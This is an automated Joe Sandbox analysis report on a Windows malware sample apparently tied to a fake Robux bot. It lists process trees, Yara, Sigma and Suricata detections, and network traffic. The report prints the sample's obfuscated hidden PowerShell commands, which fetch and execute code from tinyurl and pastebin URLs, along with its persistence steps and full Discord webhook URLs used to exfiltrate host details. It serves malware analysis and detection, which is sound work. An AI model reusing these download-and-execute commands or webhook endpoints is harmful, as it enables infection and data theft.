Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vF20HtY4a4.exe

Overview

General Information

Sample name:vF20HtY4a4.exe
renamed because original name is a hash value
Original sample name:f06b0c9ae4553b0558c06ecfcb657a9f1d5a42da37caec81ae4a91dd5d03b332.exe
Analysis ID:1534114
MD5:d17a39ca8331a4ce65261b1b6dc7e6ac
SHA1:7972d0341973a0816d2534f187676f9c00dc38c7
SHA256:f06b0c9ae4553b0558c06ecfcb657a9f1d5a42da37caec81ae4a91dd5d03b332
Tags:exeNeth3Nuser-JAMESWT_MHT
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to a URL shortener service
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • vF20HtY4a4.exe (PID: 6032 cmdline: "C:\Users\user\Desktop\vF20HtY4a4.exe" MD5: D17A39CA8331A4CE65261B1B6DC7E6AC)
    • conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • attrib.exe (PID: 5164 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 4820 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 5204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6200 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5632 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 3900 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4260 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5336 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 5632INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1260ab:$b1: ::WriteAllBytes(
  • 0x1a578b:$b1: ::WriteAllBytes(
  • 0x46a33:$s1: -join
  • 0x54a0b:$s1: -join
  • 0x591ef:$s1: -join
  • 0x1605c5:$s1: -join
  • 0x160d25:$s1: -join
  • 0xc3cb1:$s3: reverse
  • 0xc3f9f:$s3: reverse
  • 0xc46b9:$s3: reverse
  • 0xc4e72:$s3: reverse
  • 0xcbdce:$s3: reverse
  • 0xcc1e8:$s3: reverse
  • 0xccd70:$s3: reverse
  • 0xcda1d:$s3: reverse
  • 0xf9873:$s3: reverse
  • 0x1004f5:$s3: reverse
  • 0x10239d:$s3: reverse
  • 0x10d3cc:$s3: reverse
  • 0x172e15:$s3: reverse
  • 0x17e561:$s3: reverse
Process Memory Space: powershell.exe PID: 5336INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xc4442:$b1: ::WriteAllBytes(
  • 0x56dce:$s1: -join
  • 0x5752e:$s1: -join
  • 0x8e351:$s1: -join
  • 0x958b3:$s1: -join
  • 0xc9d8a:$s3: reverse
  • 0xd3dc0:$s3: reverse
  • 0xf47f2:$s3: reverse
  • 0xfff21:$s3: reverse
  • 0x14ef01:$s3: reverse
  • 0x14f1ef:$s3: reverse
  • 0x14f909:$s3: reverse
  • 0x1500c2:$s3: reverse
  • 0x157000:$s3: reverse
  • 0x15741a:$s3: reverse
  • 0x157fa2:$s3: reverse
  • 0x158c4f:$s3: reverse
  • 0x16b9e6:$s3: reverse
  • 0x172668:$s3: reverse
  • 0x1744fb:$s3: reverse
  • 0x17f52a:$s3: reverse

Other

SourceRuleDescriptionAuthorStrings
amsi64_5632.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
amsi64_5336.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vF20HtY4a4.exe", ParentImage: C:\Users\user\Desktop\vF20HtY4a4.exe, ParentProcessId: 6032, ParentProcessName: vF20HtY4a4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), ProcessId: 3364, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3364, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vF20HtY4a4.exe", ParentImage: C:\Users\user\Desktop\vF20HtY4a4.exe, ParentProcessId: 6032, ParentProcessName: vF20HtY4a4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), ProcessId: 3364, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vF20HtY4a4.exe", ParentImage: C:\Users\user\Desktop\vF20HtY4a4.exe, ParentProcessId: 6032, ParentProcessName: vF20HtY4a4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), ProcessId: 3364, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vF20HtY4a4.exe", ParentImage: C:\Users\user\Desktop\vF20HtY4a4.exe, ParentProcessId: 6032, ParentProcessName: vF20HtY4a4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), ProcessId: 3364, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T16:08:45.790087+020028576591A Network Trojan was detected192.168.2.849718162.159.136.232443TCP
2024-10-15T16:08:53.748074+020028576591A Network Trojan was detected192.168.2.849719162.159.136.232443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T16:08:33.538671+020028576581A Network Trojan was detected192.168.2.849713162.159.136.232443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: vF20HtY4a4.exeReversingLabs: Detection: 34%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 88.2% probability
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49719 version: TLS 1.2
Source: vF20HtY4a4.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbAC source: powershell.exe, 00000009.00000002.2015256142.000001FD29726000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000009.00000002.2014277292.000001FD294F4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2118591643.00000210EA688000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbd source: powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbr source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator.ADMINISTRATOR\Downloads\Origami-master\Origami-master\src\obj\x64\Release\net472\Origami.pdb source: vF20HtY4a4.exe
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbI source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb6 source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbW source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb( source: powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbdatetime source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb#D source: powershell.exe, 00000009.00000002.2015256142.000001FD29726000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD297DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2117616989.00000210EA5FE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscoree.dllKC:/Users/GLaDOS/The/Cake/Is/A/Lie.pdb source: vF20HtY4a4.exe
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbe089R source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbQ source: powershell.exe, 0000000E.00000002.2119928343.00000210EA911000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32\Win Jh source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdba source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator.ADMINISTRATOR\Downloads\Origami-master\Origami-master\src\obj\x64\Release\net472\Origami.pdbSHA256 source: vF20HtY4a4.exe
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb( source: powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbm source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.8:49718 -> 162.159.136.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.8:49719 -> 162.159.136.232:443
Source: Network trafficSuricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.8:49713 -> 162.159.136.232:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: tinyurl.com
Source: unknownDNS query: name: tinyurl.com
Source: Joe Sandbox ViewIP Address: 162.159.136.232 162.159.136.232
Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox ViewIP Address: 104.18.111.161 104.18.111.161
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 216Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 297Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 297Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bdhpvpny HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
